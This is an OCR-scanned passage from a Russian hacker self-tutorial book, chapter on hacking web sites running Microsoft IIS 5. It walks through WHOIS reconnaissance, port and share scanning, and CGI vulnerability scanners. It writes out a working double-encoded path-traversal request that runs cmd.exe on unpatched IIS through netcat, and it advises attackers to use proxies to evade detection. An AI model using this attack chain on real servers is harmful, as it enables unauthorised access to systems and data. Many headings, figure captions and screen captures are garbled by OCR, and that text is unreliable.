В качестве серверов Web используется множество программных средств от раз-личных производителей, включая информационный сервер Интернета IIS от фир-мы Microsoft, сервер Apache HTTP Server от фирмы Apache Software Foundation идругие. Эти серверы передают запросы приложениям Web, созданным на основетехнологии ASP (Active Server Page — активные страницы сервера) протокола CGI,регламентирующего вызовы сценариев сервера, сервлетов Java фирмы SUN, языкаРНР фирмы Apache Software Foundation и многих других.

Приложения Web, получив запрос от сервера Web, чаще всего обращаются кбазам данных, чтобы извлечь нужную информацию. В качестве этих баз дан-ных используются базы SQL фирмы Microsoft, Oracle фирмы Oracle и так далее.А чтобы подсоединиться к базам данных, передать им запрос и обменяться ин-формацией, в общем, выполнить функции управления базами данных — чащевсего используются протоколы ODBC (Open Data Base Connectivity — Открытыйинтерфейс доступа к базам данных).

И вот перед хакером встает задача — взломать всю эту махину программ, прото-колов, сценариев, языков, баз данных, операционных систем… Что же он дол-жен для этого сделать?

Этапы хзк1штз Web~caumaИсходя из такой многоуровневой структуры средств, обеспечивающих работу сресурсами Web-сайта, хакеру приходится потрудиться для прорыва к нужномуему информационному ресурсу. Как правило, от хакера потребуется выполнениеследующих задач.

116

Page 117: Самоучитель хакера подробное иилюстрированное руководство

Хакинг Web-сайтов

• Исследовать структуру Web-сайта — определить, какие компоненты входят всредства, обеспечивающие работу сайта, в том числе какие клиенты, прото-колы, серверы и приложения Web используются сайтом.

• Взломать Web-сервер — поскольку Web-сервер всегда подключен к Интернету,как правило, через TCP-порт 80, а программы, реализующие Web-серверы,изобилуют уязвимостями (про которые регулярно оповещают всех желаю-щих базы данных CVE, и даже ленты новостей многих Web-сайтов), то уда-ленный взлом Web-серверов — это отнюдь не фантастика.

• Исследовать приложение Web — какие механизмы задействованы для обра-ботки запросов — ASP, скриптлеты Java, CGI и так далее — без этого ничегосделать не удастся, сами понимаете.

• Взломать систему защиты приложения Web — это означает, во-первых, взломмеханизма аутентификации, а во-вторых, механизма авторизации пользова-теля (и обойти систему аудита!). Задача аутентификации состоит в подборепароля, скажем, методом словарной атаки или методом грубой силы — про-стым перебором всех вариантов пароля. Задача авторизации решается мно-гими путями, например, подменой файла куки (cookie), идентифицирующегопользователя, если для авторизации использован механизм файлов куки.

• Выполнить атаку вводом данных — хакер должен попытаться взломать защи-ту приложения путем передачи Web-приложению специально подобранныхданных, воспользовавшись уязвимостями приложения, вызванными ошибка-ми программирования. Наличие таких уязвимостей позволит, например, пе-редать CGI-сценарию исполняемый код вместо числового параметра, — и еслиэтот CGI-сценарий не проверяет входные параметры, то, исполнив передан-ный хакерский код, сервер открывает к себе доступ.

• Исследовать интерфейс с базой данных — именно базы данных хранят нуж-ную хакеру информацию, так что хакер должен изучить способ подключенияWeb-приложения к базе данных, чтобы попытаться им воспользоваться.

• Взломать защиту интерфейса управления сайтом — как правило, Web-сайтыснабжены средствами удаленного управления, так что ,у них всегда имеетсяоткрытый порт для удаленного управления, и его поиск и взлом — весьмаэффективный метод хакинга.

• Взломать сайт с помощью клиента — например, подменив серверный сцена-рий, можно собирать информацию обо всех посетителях сайта, а если этотсценарий внедрить в содержимое Web-странички, можно выполнять успеш-ный хакинг Web-клиентов, который мы обсуждали в предыдущей главе.

Ясно, что описание всех этих средств заняло бы целую книгу (например, см. [И]).Мы, однако, ограничимся только некоторыми, наиболее популярными метода-ми взлома сайтов, реализованных с помощью сервера IIS 5. Мы опишем, как

117

Page 118: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

можно получить доступ к файловой системе серверного компьютера (раздел«Хакинг HTTP»), найти уязвимые CGI-сценарии сервера (раздел «Уязвимыесценарии») и получить доступ к запароленной страничке Web взломом паролядоступа методом грубой силы (раздел «Взлом доступа к страничкам Web»).В конце главы мы опишем методы загрузки на жесткий диск компьютера целогоWeb-сайта и объясним, что из этого можно извлечь для пользы дела.

Сервер IIS избран по той причине, что это наиболее популярный Web-сервер,ставший поэтому излюбленной мишенью для хакеров. Антихакер должен отчет-ливо понимать, что взлом Web-сайта представляет собой значительную угрозу,поскольку взломанный сервер — это ворота в сеть организации, и проникнувше-му в серверный компьютер хакеру открываются большие возможности. Хакерсможет изменять содержимое сайта — а это прямая угроза фальсификации и дис-кредитации всей организации, которой принадлежит взломанный Web-сайт. Ха-кер сможет перехватывать почту — а это угроза конфиденциальности информа-ции или ее фальсификации. Далее, подменяя загружаемые по FTP-доступу фай-лы, хакер сможет распространять вирусы, трояны и прочие хакерские утилиты.Так что методы хакинга сайтов должны быть досконально известны антихакеру -более того, именно с их учетом следует выполнять тестирование системы защи-ты сайта на предмет ее устойчивости к атакам.

Рассмотрим перечисленные выше задачи хакинга Web-сайтов по порядку.

Исследование Web~caumaНикакой серьезный взломщик компьютерной информационной системы, в томчисле Web-сайта, не приступит к атаке без тщательного изучения применяемыхв системе компьютерных технологий. Взломщика будет интересовать архитек-тура сети, используемые операционные системы, общие ресурсы сети, учетныезаписи пользователей этих ресурсов, типы сетевых серверов. Для получения та-кого рода сведений хакеры, как правило, выполняют следующие действия.

• Предварительный сбор данных, заключающийся в систематизированном сбо-ре открытых сведений о Web-сайте конкретной организации, включая диапа-зон ГР-адресов сети, подсоединенной к Интернету, сведения о DNS-серверах,зарегистрированных доменных именах и администраторах сети.

• Сканирование сети организации с целью выявления сервера Web.

• Инвентаризацию открытых портов, запущенных служб и типа операционнойсистемы серверного компьютера.

118

Page 119: Самоучитель хакера подробное иилюстрированное руководство

Хакинг Web-сайтов

Предварительный c£bp данныхВо время предварительного сбора данных о намеченном для атаки Web-сайтехакер может и должен обратиться к ресурсам Интернета. Эти ресурсы включаютследующее.

• Во-первых, хакер может обратиться к сведениям, хранимым в базах данныхорганизаций — поставщиков услуг Интернета, обязанных регистрироватьподключаемые к Интернету серверы и сети. Эти данные содержат выделяе-мые IP-адреса, фамилии, телефоны и адреса администраторов сети, доменныеимена и прочую весьма полезную информацию. В разделе «Базы данныхWhols» мы укажем источники этих сведений.

• Во-вторых, следует самым внимательным образом изучить HTML-код стра-ниц Web-сайта атакуемой организации. Код HTML может содержать ком-ментарии, не отображаемые браузерами Web, но содержащие весьма инте-ресные сведения, вносимые разработчиками страниц для справочных целей.К примеру, в комментариях могут содержаться контактные телефоны, струк-тура каталогов сервера, адреса электронной почты разработчика, коды сцена-риев JavaScript и многое другое. Все это весьма ценные сведения для выпол-нения атаки, и методы извлечения HTML-кода сайта Web описаны в разделе«Web-спайдер Teleport Pro».

Начать, конечно, следует с регистрационной базы данных Whols — там содер-жатся первичные, самые важные сведения о локальной сети, поддерживающейподсоединенный к Интернету сервер Web. Для извлечения этих данных можноприбегнуть к утилите командной строки whois (традиционного средства системыUnix), но легче и проще обратиться к Web-сайтам организаций, предоставляю-щих бесплатный сервис whois прямо со своих Web-страничек.

£азы данных WholsВначале обсудим первую возможность. Каждая компания, желающая получить соб-ственное доменное имя в Интернете, обязана зарегистрировать свою локальнуюсеть в специальной уполномоченной организации. До 1999 года такое право имелаединственная организация — Network Solution (http://www.networksolution.com),но теперь услуги по регистрации сетей предоставляет множество других органи-заций, например, InterNic (http://www.internic.net). Сайты этих организаций со-держат открытые базы данных со сведениями о зарегистрированных организа-циях и/или ссылки на другие сайты с подобной информацией.

Пользуясь сервисами таких Web-сайтов, которые часто называются серверамиWhois (серверы «Кто есть Кто»), можно получить весьма подробные сведения обинформационной системе организации. Хакер может запросить у сервера Whoisвсе доменные имена Интернета, зарегистрированные организацией, телефон и

119

Page 120: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

адрес электронной почты администратора домена, имена и адреса серверов DNSсети. В лучшей Европейской базе данных такого рода, принадлежащей центруRIPE NCC (Network Coordinate Center — Центр сетевых координат), содержатсясведения о диапазоне IP-адресов зарегистрированных сетей вместе с личнымиданными их администраторов. Все эти данные можно запросить с помощью весь-ма удобного интерфейса Web-страницы центра RIPE NCC (http://www.ripe.net),представленной на Рис. 8.1.

<г* Назад т •$ -V gjj [JQ £J j i По иск ОУ Избранное ^Журнал j j* 4>t @ T 1

Aqp9c|fehltp://www.ripB.net/npen^ ub^ c^ El ^Пароход |

Рис. 8.1. Web-страничка центра RIPE NCCдля поиска сведений об организации по IP-адресу ее Web-сайта

Что же будет делать взломщик со всей этой информацией? Получив предвари-тельные сведения о локальной сети организации — ГР-адрееа подключенных кИнтернету узлов сети и серверов DNS сетевых доменов — он продолжит изуче-ние сети путем сканирования и инвентаризации сервера.

Сканирование и инвентаризация сервераДля выполнения этой задачи существует множество утилит, одной из лучшихсчитается утилита SuperScan (http://www.foundstone.com), диалог которойприведен на Рис. 8.2.

Чтобы воспользоваться утилитой SuperScan, выполните такие шаги.

> В поле Start (Старт) введите начальный ГР-адрес сканируемой сети.

> В поле Stop (Стоп) введите конечный адрес сканируемой сети.

>• В группе элементов управления Scan type (Тип сканирования) установитепереключатель All list ports from (Все перечисленные порты в диапазоне).

> Щелкните на кнопке Start (Пуск).

120

Page 121: Самоучитель хакера подробное иилюстрированное руководство

Хакинг Web-сайтов

StarlfTMT

Stop|l.0.0.5

0 Ignore IP zero0 Ignore IP 255П Extract from He

Timeout

P’ng

|400 |

Conned

|2000 |

Read

14000 I

П Resolve hoslnames121 Only scan responsive pings[3 Show host responses

О Ping only

О Every port in lisl

О All selected ports in list

(5 All list poets from

О All ports from

5ИЯИИИ EZBШ

Рис. 8.2. Сканирование сети выявляет все открытые портыи запущенные службы

В поле внизу диалога SuperScan отобразятся результаты сканирования. Как ви-дим, на компьютере с IP-адресом 1.0.0.1 открыт порт протокола HTTP и запу-щен сервер IIS 5.0, так что мы получили нужный результат — наличие в сети сер-вера Web. И хотя мы экспериментируем в нашей локальной интрасети (чтобыникого не обидеть), процедура получения этих сведений в Интернете выполняетсяподобным образом.

6 shares found on 1 remote hosts.

wa- 1.0.0,1My DocumentsNETLOGON

DTeslMy DownloadsSYSVOL

M.0.0.1SMy DocumentsM.O.(mNETLOGONM.0.0.1\DM.0.0.1\TeslМ.СЩПМу DownloadsM.0.0.1\SYSVOL

Map Drive

Рис. 8.З. Инвентаризация ресурсов найденного сервера IIS 5

121

Page 122: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Инвентаризацию общих ресурсов найденного сервера можно выполнить с помо-щью чрезвычайно популярной программы Legion (http://packetstormsecurity.org/groups/rhinoS), результат применения которой к найденному хостус ГР-адресом 1.0.0.1 представлен на Рис. 8.3.

Теперь, зная о наличии по данному ГР-адресу сервера IIS 5, нас сразу же начинаетинтересовать вопрос — можно ли взломать доступ к этому серверу, и каким обра-зом? Обсудим эту тему поподробнее.

рвера II5се|Хакинг сервера IIS базируется на уязвимостях программных средств сервера,основанных на протоколах HTTP (Hypertext Transfer Protocol — Протокол пере-дачи гипертекста) и CGI (Common Gateway Interface — Общий шлюзовой интер-фейс), а также на уязвимых сценариях сервера IIS, открывающих доступ к ре-сурсам серверного компьютера.

Протокол HTTP описан, например, в [12], и его функция — обеспечение взаи-модействия сервера и клиента Web при запросе и получении текстовой ин-формации. Для этого протокол HTTP предоставляет несколько методов,основным из которых является метод GET. Когда Web-браузер запрашивает усервера информационный ресурс (скажем, текстовый файл), он используетметод GET, одновременно указывая адрес ресурса, например,http://www.anyserver.com/documents/order.html. Этот адрес указывает на файлorder.html в каталоге /documents сервера IIS, которому соответствует каталоглокальной файловой системы c:\inetpub\wwwroot\documents.

Протокол CGI описан, например, в [12], и он регламентирует удаленные вызовысерверных сценариев со стороны клиентов. Вызовы сценариев выполняются спомощью запросов протокола HTTP, которые имеют такой вид:

http://www.anysite.com/scripts/MyScript?napaMeTp1+napaMeTp2

Здесь MyScript — это название сценария, хранящегося в папке /scripts сервера IIS, aзапись ?Параметр1+Параметр2 определяет фактические параметры, передаваемыесерверному сценарию MyScript. Сервер IIS определяет, что поступивший запроспредназначен для обработки сценарием, после чего запускает программу сценария,передает ей параметры и выполняет передачу результатов запроса клиенту.

Кроме протокола CGI, для работы со сценариями используются технологии ASP(Active Server Pages — Активные страницы сервера) и ISAPI (Internet ServerProgramming Interface — Программный интерфейс сервера Интернет). В техноло-гии ASP вызов сценариев выполняется такой строкой запроса:

http://www.anysite.com/scripts/MyScripts7napaMeTp1 =Значение1&Параметр2=Значение2

122

Page 123: Самоучитель хакера подробное иилюстрированное руководство

Хакинг Web-сайтов

В результате исполняется сценарий MyScript.asp, который, как правило, гене-рирует новую страницу HTML. Интерфейс ISAPI предоставляет возможностьудаленного вызова функций, хранимых в библиотеках ISAPI. Вызов этих функ-ций выполняется по такому запросу HTTP:

http://www.anysite.com/isapi.с111?Переменная1&Переменная2

Теперь, узнав некоторые сведения о работе сервера IIS, посмотрим, чем они мо-гут помочь работе хакера.

ХакиигИГГГПротокол HTTP позволяет хакерам достичь много, поскольку его поддержкасервером IIS не отличается надежной защитой от попыток несанкционированно-го доступа. В ранних версиях IIS 2.0 достаточно было ввести такой адрес:

http://www.anysite.eom/.7.7.7.7.7winnt/secret.file

чтобы загрузить с Web-сервера информацию, содержащуюся в файле secret.txt.Это — пример ошибки в реализации системы защиты Windows, хранящей разре-шения на доступ к информационным ресурсам в списках ACL. В более новыхверсиях IIS эта ошибка исправлена, но ее можно найти у Web-серверов другихпроизводителей [3]. А взамен описанной уязвимости в последних версиях IISимеются другие, и их список непрерывно пополняется, что можно видеть по со-общениям на сайтах, посвященных информационной безопасности, например,SecurityLab.ru (http://www.securitylab.ru).

Чтобы исследовать такого рода уязвимости IIS, очень удобно использоватьутилиту netcat (http://www.atstake.com), (netcat — это очень мощный инстру-мент — недаром авторы [3] называют netcat основным орудием хакинга IIS).Проиллюстрируем использование netcat для атаки на сервер Sword-2000 нашейэкспериментальной сети, к услугам которой мы прибегаем на протяжении всейкниги. Для использования netcat в наших целях выполните такую процедуру.

>• Запустите из командной строки компьютера Alex-З утилиту netcat, выполнивкоманду nc -vv 1.0.0.1 80.

v После появления сообщения об открытии соединения с сервером введите

строку GET / HTTP/ 1.0 и два раза нажмите клавишу 1Еп1ег1. Результат пред-

ставлен на Рис. 8.4.

Запрос GET / HTTP/1.0 по умолчанию запрашивает файл из корневого каталогасервера IIS. Как видно из Рис. 8.4, в ответ получен файл с кодом HTML, загрузкакоторого в браузер воспроизведет сообщение об ошибке.

123

Page 124: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

ic-MCommand Piompl

|c:\test\netcat>nc -vv 1.0.0.1 80DNS fud/reu nisnatch: SUORD-20UO != suord-2000.suoi-d.netSUORD-2000 tl.0.0.1] 80 <http> openGET / HTTP /1.0

HTTP/1.1 400 Bad RequestSeruer: Microsoft-IIS/S.0Date: Fri, 28 Feb 2003 12:55:40 GHIContent-Type: text/htnlContent-Length: 87

<>itml><}iead><title>Error</titleX/head><body>The parameter</htnl>sent 17, rcud 224: NOISOCK

C:\test4netcat>

Puc. 8.4. Запрос GET к серверу IIS из утилиты netcat

Чтобы облегчить себе жизнь, можно передавать запросы GET другим способом -конвейеризовав ввод данных в командной строке с помощью атрибута <.Для этого создадим текстовый файл GET.txt с такими строками:

GET/HTTP:/1.0[CRLF][CRLF]

Здесь запись [CRLF] означает пустую строку. Теперь утилиту netcat следует за-пустить следующим образом.

nc -vv 1.0.0.1 80 < get.txt

В результате после установления соединения на сервер будет переправлен текстиз файла get.txt, и результат будет аналогичен представленному на Рис. 8.4.(Удобство состоит в возможности многократного запуска запроса без необходи-мости ручного набора сложного кода.)

Покажем теперь, чего может достичь хакер такой простой процедурой. Созда-дим файл ddcode.txt с таким содержимым.

GET /scripts/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir+c:\ HTTP /1.0[CRLF][CRLF]

Теперь попробуем взломать доступ к компьютеру А1ех-1 с системой Windows2000 (русифицированная инсталляция без всяких сервисных пакетов). Запустимутилиту netcat следующим образом:

nc -vv 1.0.0.7 80 < ddcode.txt

Результат представлен на Рис. 8.5.

124

Page 125: Самоучитель хакера подробное иилюстрированное руководство

Хакинг Web-сайтов

: Command Piompt

— . 8 . 7 88 < adcode.txtatcl.: flLEX-1 • = ftLEX-1. suoi’a. n

IftLEX-l E l . e . B . 7 ] 88 Oittp> openIHTTPX1.1 289 OKISevvev: H i c v o s o f t — I I S X 5 . 8(Date: Sat, 81 Mar 2883 87:16:42 GMT

^ ёетх С эх ыьххе ьхСъш.и„хГ. еюьр: C81B-81F8

86.12.288222.12.288213.81.288386.81.288386.81.288387.82.288328.81.288386.82.2883 18:37 <DIR>

в Хрщыют8 яриюъ 1а323а482а75

>Л 713: NOTSOCK

|C:Xtest\netcat>

Рис. 8.5. Доступ к каталогам А1ех-1 получен!

Как видим, мы получили доступ к файловой системе А1ех-1 и можем делатьс ней что угодно! Но вот на сервер Sword-2000 (система Windows 2000 AdvancedServer с Service Pack 2) такая атака уже не действует — компания Microsoft лик-видировала брешь в системе защиты, причем сразу после ее обнаруженияв 2000 году. Также были ликвидированы уязвимости подобного рода, связанныес множеством других некорректно сформированных адресов URL в запросах,описание которых можно найти во многих источниках (см. [3], [4], [11]). Однакомногие ли об этом знают, и у многих ли системы Windows 2000 обновлены сер-висными пакетами?

Что же все-таки можно сделать с сервером, на котором установлены все сервис-ные пакеты и администраторы которых следят за обновлением программногообеспечения и настройками системы защиты? Имеется еще одна возможность,связанная с уязвимыми сценариями.

Уязвимые сценарииОдной из основных уязвимостей Web-серверов, в том числе сервера IIS, — это плохоепрограммирование сценариев, используемых в интерактивных Web-страницах.Дело в том, что для обмена информацией со сценариями Web-серверов исполь-зуется протокол CGI (Common Gateway Interface — Общий шлюзовой интер-фейс), который вообще не обеспечивает никакой защиты, а всего лишь регла-ментирует передачу параметров от клиента Web серверному сценарию. Получивзапрос к сценарию CGI, сервер просто передает полученные параметры сцена-рию, запущенному на сервере. Причем права сценария на доступ к ресурсамсерверного компьютера определяются контекстом безопасности Web-сервера,т.е., применительно к серверу IIS, с правами учетной записи System, обеспечиваю-щей практически полный доступ к ресурсам системы. Вот что это дает хакеру.

125

Page 126: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

То, что происходит с переданными CGI-сценарию параметрами, определяется про-граммой, а программы пишут программисты. И каждый, кто хоть когда-либо писалпрограммы, знает, насколько трудно и утомительно согласовать типы фактическихи формальных параметров программы, и насколько мешает творческой фантазиинеобходимость скрупулезно проверять корректность передаваемых параметрамиданных. Поэтому часто эта задача оставляется на потом, или вообще отбрасывает-ся — и программа становится полностью зависимой от внешней среды.

Так что если, к примеру, в сценарий Perl, выполняемый в режиме интерпрета-ции, т.е, шаг за шагом, по мере считывания кода программы, передать вместо,скажем, числового значения некийпрограммный код, то не исключено,что вместо аварийного завершениясценарий сможет исполнить пере-данный код. И это — самые настоя-щие парадные двери для хакера, по-скольку плохо написанных сценари-ев — хоть пруд пруди, и, немногопоискав по сайтам Web, где-нибудьда наткнешься на открытые двери. Ивот, чтобы упростить себе жизнь,хакеры придумали специальныесканеры CGI-сценариев, которые,обойдя весь Web-сайт, находят при-меняемые в нем сценарии и сооб-

D@MNED CGI Scanner 2.1 (177 exploits)

\> о

READY

Puc. 8.6. Рабочее окно CGl-сканераD@MNED CGI Scanner 2.1

щают о них заинтересованному ипонимающему человеку.

Мы рассмотрим здесь один из наиболее популярных сканеров CGI-сценариевD@MNED CGI Scanner 2.1 (http://shieldandsword.narod.ru/soft/scansec/scansec.htm). На Рис. 8.6 представлено рабочее окно сканера, содержащеешесть вкладок.

Рассмотрим функциональные возможности, предоставляемые вкладками рабо-чего окна сканера D@MNED CGI Scanner 2.1.

На вкладке Scanners log (Журнал сканирования) отображается статистика повсем найденным уязвимым сценариям. Кнопки на панели инструментов, пере-численные в порядке слева направо, позволяют запустить и остановить сканиро-вание, а также очистить и сохранить созданный журнал.

Вкладка Scan list (Список сканируемых узлов), представленная на Рис. 8.7, со-держит список серверов, предназначенных для сканирования. Кнопки в левойчасти панели инструментов позволяют сохранить, открыть и очистить списоксерверов, перечисленных на вкладке. Для пополнения списка серверов в поле напанели инструментов следует ввести адрес сервера и щелкнуть на кнопке с кре-

126

Page 127: Самоучитель хакера подробное иилюстрированное руководство

Хакинг Web-сайтов

стиком. Чтобы отредактировать элемент списка, следует мышью выделить эле-мент списка, в поле на панели инструментов ввести новое значение и щелкнутьна кнопке со стрелками вверх и вниз. Внизу вкладки представлены элементыуправления, позволяющие сканировать целую подсеть класса С. Установкафлажка Scan subnet (Сканировать подсеть) отменяет применение списка серве-ров и заставляет сканировать подсеть класса С в диапазоне ГР-адресов, указан-ном в полях слева. Например, эта запись может быть такой: 234.56.78.1 — 8.

Вкладка CGI holes (Уязвимости CGI) (Рис. 8.8) содержит список CGI-сценариев,содержащих известные автору программы уязвимости. Этот стандартный списокотображается на вкладке, и его можно пополнить, загрузить и отредактировать спомощью кнопок на панели инструментов, аналогичных содержащихся навкладке Scan list (Список сканируемых узлов).

1 g UttiMNtO CGI .1 (177 exploits) ттт

Рис. 8.7. Вкладка редактированиясписка сканируемых серверов

Е2ЕЕЕЯ ВВЕЗ ЕЗЕШ

Рис. 8.8. Список уязвимыхCGI-сценариев

П;

!D Use proxy

П|

:ф English

Рис. 8.9. Шпион CGl-сканера Рис. 8.10. Настройки CGl-сканерапоработал достаточно эффективно! весьма полезны

127

Page 128: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Вкладка Spy (Шпион) отображает информацию о сканируемом хосте (Рис. 8.9),включая тип Web-сервера (в данном случае — IIS 5.0), и путь к первой страницесервера (корневой каталог сервера).

Вкладка Option (Параметры), представленная на Рис. 8.10, содержит настройкипрокси-сервера, пути к папке сценариев и средства для выбора языка пользователь-ского интерфейса. Советуем не пренебрегать настройками прокси-сервера — любоймало-мальски квалифицированный хакер работает только через прокси-сервер, чтодает хотя бы какой-то шанс не засветиться (не сильно обольщайтесь, однако…).

Работа со сканером D@MNED CGI Scanner 2.1 не вызывает затруднений.Для иллюстрации отсканируем в нашей экспериментальной сети хост А1ех-1с IP-адресом 1.0.0.7, выполнив такие шаги.

> На вкладке Scan list (Список сканируемых узлов) удалите установленный поумолчанию хост http://www.altavista.com и добавьте IP-адрес 1.0.0.7.

>• Перейдите на вкладку Scanner log (Журнал сканирования) и запустите про-цедуру сканирования. В результате получится список уязвимых сценариев,представленный на Рис. 8.11.

Числовые коды в списке уязвимо-стей (на Рис. 8.11 отображены 200 и500) отмечают результат проверки;эти коды перечислены в справоч-ной системе программы. Например,200 означает успешное завершение- сценарий найден, а 500 — неудачу.Так что теперь можно собрать всесообщения с кодом 200 (они так иотмечены — SUCCESS) и далееможно поискать эксплойт для най-

‘• D@MNED CGI Sea • 2 1 (177 exploits) я .

Scanner log]|scan list]|CGl holas|| Spy || Options [| About..

1:0,0.7/

1.0.fl,7/_v1.0.0.7/ils1,0,0,7/itI.U.0.7.1.0,0.7.№0,7/ , s ] f -1.0.0.7/ib1.0.0.7/! >.SS ) •to:o.7/i1.0,0,7/i» -.0.7/1

,0,7/ilssam.0.7/msai 3 ]

• — 5(

Рис. 8.11. Список уязвимостей сервераIIS 5.0 впечатляет

денной уязвимости.

К сожалению, авторы программыD@MNED CGI Scanner 2.1 не позабо-тились о более точном описаниинайденных уязвимостей и об указании соответствующих им эксплойтов. Такоеописание, без сомнения, позволило бы более эффективно взломать сервер с най-денной уязвимостью. Поэтому для дальнейшего продвижения хакеру следуетприбегнуть к базам данных уязвимостей и эксплойтов, про которые мы упомина-ли в Главе 1, например, MITRE CVE (http://www.mitre.org). В данном случае, каквидно из Рис. 8.11, сервер IIS содержит файлы .htr и .idq.; Вот что на этот счет го-ворит база уязвимостей MITRE.

CVE-2001-0500

128

Page 129: Самоучитель хакера подробное иилюстрированное руководство

Хакинг Web-сайтов

Buffer overflow in ISAPI extension (idq.dll) in Index Server 2.0 and Indexing Ser-vice 2000 in IIS 6.0 beta and earlier allows remote attackers to execute arbitrarycommands via a long argument to Internet Data Administration (.ida) andInternet Data Query (.idq) files such as default.ida, as commonly exploited byCode Red.

(Переполнение буфера в расширениях ISAPI (idq.dll) в Index Server 2.0 и In-dexing Service 2000 в IIS 6.0 бета-версии позволяет выполнять удаленныйвзлом для исполнения произвольных команд с помощью длинных аргу-ментов в файлах .ida (Internet Data Administration — Администрированиеданных Интернета) и .idq (Internet Data Query — Запрос данных Интернета),например, default.ida, который обычно используется червем Code Red.)

Reference: BUGTRAQ:20010618 All versions of Microsoft Internet InformationServices, Remote buffer overflow (SYSTEM Level Access)

Reference: MS:MS01-033

Reference: CERT:CA-2001-13

Reference: BID:2880

Reference: XF:iis-isapi-idq-bo(6705)

Reference: CIAC:L-098

Как видим, CGI-сканер нашел уязвимость сервера IIS к атакам переполнениябуфера — излюбленному инструменту хакинга IIS. А чтобы практически исполь-зовать найденную уязвимость, следует обратиться к базам эксплойтов, одна изкоторых содержится на сайте http://www.securitylab.ru. И действительно, наэтом сайте имеется описание найденной уязвимости, сообщающей следующее.

«В заданной по умолчанию инсталляции IIS позволяется использование .htrфайлов, которые используются для изменения Web паролей. Переполне-ние памяти «кучи» существует в компоненте сервера, который использует-ся для обработки запросов к .htr файлам (ISM.DLL).

Эта уязвимость была проверена на IIS 4.0 и 5.0 с SP2 и самыми последни-ми заплатами защиты от 1 апреля 2002.

Когда IIS получает запрос к какому-либо файлу, он проверяет, соответст-вует ли расширение на файле в запросе расширению в отображенных сце-нариях. Затем он передает запрос к ISAPI фильтру для дальнейшей обра-ботки, .htr файлы могут не присутствовать на системе для запроса, кото-рый будет обработан ISM.DLL.

Специальный запрос к ISM.DLL может вызвать переполнение кучи в про-цессе обработки. Это переполнение может использоваться для выполне-ния произвольного кода с правами IWAM_COMPUTERNAME.

Уязвимость может использоваться для распространения саморазмножаю-щихся червей. Уязвимость найдена в IIS 4.0-5.1.»

1295 — 5830

Page 130: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

К сожалению, на сайте SecurityLab.ru для рассматриваемой уязвимости пред-ложен эксплойт только для систем Unix и Pyton, что затрудняет его использова-ние в домашних условиях. Такая ситуация очень распространена, и поиск экс-плойтов для других уязвимостей чаще всего приносит всего лишь исходный кодпрограмм, что характерно для такого рода инструментов (может быть, это связанос наличием проблем в их разработке).

Более обширную информацию о найденных уязвимостях предоставляет про-грамма CGI Vulnerability Scan (http://www.wangproducts.co.uk), рабочее окнокоторой представлен на Рис. 8.12.

aglimpseAnyform2args.batargs.cmdAT-adminAuthbnbform.cgibsguest.cgibslist.cgicalender.plcampascarbo.dllCGI CounterCGImail.execgiwrapclassifieds.cgi

+ Deselect All

1 1

Scan All Scan Selected Stop Scanning Proxy Setup-/ <a 0 &

!& Save Results f Clear Log В Ex*

Idle…

Puc. 8.12. Сканер CGI Vulnerability Scan достаточно прост и эффективен

В приложенной к программе документации можно найти описание уязвимыхCGI-сценариев, известных программе, однако эта база данных поддерживает-ся недостаточно эффективно — новые уязвимости в ней отсутствуют. За нимиследует охотиться на сайтах Интернета, например, SecurityLab.ru(http://www.securitylab.ru), где очень часто мелькают сообщения о только что най-денных уязвимостях серверов IIS (и других серверов), сопровождаемые описаниямиуязвимостей и даже использующими их эксплойтами для хакинга серверов IIS.

Итак, приложив некоторое умение, и при условии некоторого везения хакер мо-жет взломать сервер HTTP — и дело сделано. Ну а если это ему не удастся — чтоже еще полезного для хакинга компьютерной сети организации или для другихцелей можно извлечь из Web-сайта? Осталась одна возможность — исследо-вать HTML-код Web-страничек, который подчас хранит в себе очень много ин-тересных открытий. Но чтобы исследовать код HTML, его следует загрузить изWeb, поскольку подробное изучение кода HTML дело не быстрое и не простое.Наилучшее решение такой задачи состоит в сканировании ресурсов Web в поис-ках полезной информации с последующей загрузкой содержимого сайта на ком-пьютер. Признанным фаворитом среди инструментов, предназначенных для та-ких операций, считается программа Teleport Pro (http://www.ten-max.com), пре-доставляющая широкий набор возможностей по настройке процедур поиска

130

Page 131: Самоучитель хакера подробное иилюстрированное руководство

Хакинг Web-сайтов

в сети Web и загрузке найденных ресурсов на локальный компьютер. Вкратцеопишем возможности Teleport Pro.

Web’cnsuc)ep*feLeport froПрограмма Teleport Pro представляет собой мощный инструмент для офлайно-вого просмотра Web-сайтов, создания зеркальных копий Web-сайтов и извлече-ния из Интернета файлов с полезными ресурсами. Программа Teleport Pro обес-печивает полностью автоматический режим работы, причем одновременно не-скольких копий программы (это свойство называется многопоточностью), функ-ционируя подобно пауку, перемещающемуся в сети Web по ссылкам на Web-сайте.Программы, обладающие последним из указанных свойств, на компьютерномсленге называются «слайдерами» — от английского слова «spider» — паук.

Такие Web-спайдеры способны безо всякого участия пользователя «ползать» посети Web в поисках «жертвы» — файла с нужной информацией. А чтобы опреде-лить, нужен ли вам встреченный при поиске файл, спайдер использует специаль-ные критерии, заданные пользователем. Спайдер Teleport Pro умеет делать сле-дующие вещи.

• Загружать Web-сайты целиком для последующего просмотра в офлайновомрежиме.

• Создавать точные копии Web-сайта, полностью сохраняющие структуру ка-талогов вместе с хранимыми файлами.

• Выполнять поиск на Web-сайте файлов определенного типа.

• Автоматически загружать список файлов с Web-сайта.

• Исследовать любой Web-сайт, связанный с центральным Web-сайтом.

• Производить поиск на Web-сайте по ключевым словам.

• Создавать список всех страниц и файлов на Web-сайте.

Все эти возможности Teleport Pro очень полезны для хакинга, поскольку позво-ляют вместо утомительного ручного поиска по Web нужной информации, щелч-ков на ссылках и просмотра страниц автоматически загружать нужные файлы ибез всякой спешки тщательно изучать их на своем компьютере.

Для работы с Teleport Pro вы должны создать файл проекта, содержащий не-сколько адресов файлов, хранимых в сети Web. В файле проекта следует такжеуказать несколько правил выбора гиперссылок, по которым должны выполнять-ся переходы слайдера, и файлов для загрузки из Web. Далее командой менюStart (Старт) запускается работа слайдера — и вы можете просто подождать ре-зультата, пока Teleport Pro прочитает файлы с указанными адресами, извлечет

131

Page 132: Самоучитель хакера подробное иилюстрированное руководство

